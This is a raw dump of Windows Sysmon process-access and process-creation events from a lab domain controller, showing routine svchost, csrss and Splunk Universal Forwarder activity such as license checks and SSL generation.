08:41:23.965{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001778Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:23.965{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001777Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:23.965{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001776Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:23.965{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001775Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:23.965{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001774Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:23.965{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001773Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:23.965{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001772Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:23.965{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001771Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:23.965{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001770Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:23.965{5D479F2C-169F-5F84-0500-000000007F01}648664C:\Windows\system32\csrss.exe{5D479F2C-16B3-5F84-4A00-000000007F01}3780C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x80000000000000001769Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:23.965{5D479F2C-16B3-5F84-4800-000000007F01}32842912C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe{5D479F2C-16B3-5F84-4A00-000000007F01}3780C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4022c|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+403f8|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+404c7|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+40fee|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+64ab|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+1807c|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+1adfc|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4cf68|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 154100x80000000000000001768Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:23.970{5D479F2C-16B3-5F84-4A00-000000007F01}3780C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" check-licenseC:\Windows\system32\NT AUTHORITY\SYSTEM{5D479F2C-169F-5F84-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{5D479F2C-16B3-5F84-4800-000000007F01}3284C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal pre-flight-checks --answer-yes --no-prompt 10341000x80000000000000001767Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:23.933{5D479F2C-16B3-5F84-4900-000000007F01}22722276C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE{5D479F2C-16B1-5F84-3000-000000007F01}2616C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e675|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e1a6|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f344c|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f2a91|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+19fdb50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001766Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:23.699{5D479F2C-16B2-5F84-3A00-000000007F01}37963816C:\Windows\system32\conhost.exe{5D479F2C-16B3-5F84-4900-000000007F01}2272C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001765Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:23.699{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001764Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:23.699{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001763Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:23.699{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001762Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:23.699{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001761Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:23.699{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001760Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:23.699{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001759Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:23.699{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001758Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:23.699{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001757Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:23.699{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001756Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:23.699{5D479F2C-169F-5F84-0500-000000007F01}6482424C:\Windows\system32\csrss.exe{5D479F2C-16B3-5F84-4900-000000007F01}2272C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x80000000000000001755Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:23.699{5D479F2C-16B3-5F84-4800-000000007F01}32842912C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe{5D479F2C-16B3-5F84-4900-000000007F01}2272C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4022c|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+403f8|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+404c7|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+40fee|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+1803d|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+1adfc|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4cf68|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 154100x80000000000000001754Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:23.705{5D479F2C-16B3-5F84-4900-000000007F01}2272C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" generate-sslC:\Windows\system32\NT AUTHORITY\SYSTEM{5D479F2C-169F-5F84-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{5D479F2C-16B3-5F84-4800-000000007F01}3284C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal pre-flight-checks --answer-yes --no-prompt 10341000x80000000000000001753Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:23.683{5D479F2C-16B2-5F84-3A00-000000007F01}37963816C:\Windows\system32\conhost.exe{5D479F2C-16B3-5F84-4800-000000007F01}3284C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001752Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 